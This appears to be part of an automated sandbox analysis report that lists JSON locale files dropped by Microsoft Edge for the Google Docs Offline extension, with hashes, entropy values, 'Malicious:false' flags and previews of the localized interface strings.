                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):972
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                              MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                              SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                              SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                              SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):990
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                              MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                              SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                              SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                              SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1658
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                              MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                              SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                              SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                              SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1672
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                              MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                              SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                              SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                              SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):935
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                              MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                              SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                              SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                              SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1065
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                              MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                              SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                              SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                              SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2771
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                              MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                              SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                              SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                              SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):858
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                              MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                              SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                              SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                              SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):954
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                              MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                              SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                              SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                              SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):899
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                              MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                              SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                              SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                              SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2230
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                              MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                              SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                              SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                              SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1160
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                              MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                              SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                              SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                              SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3264
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                              MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                              SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                              SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                              SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3235
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                              MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                              SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                              SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                              SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                              Malicious:false
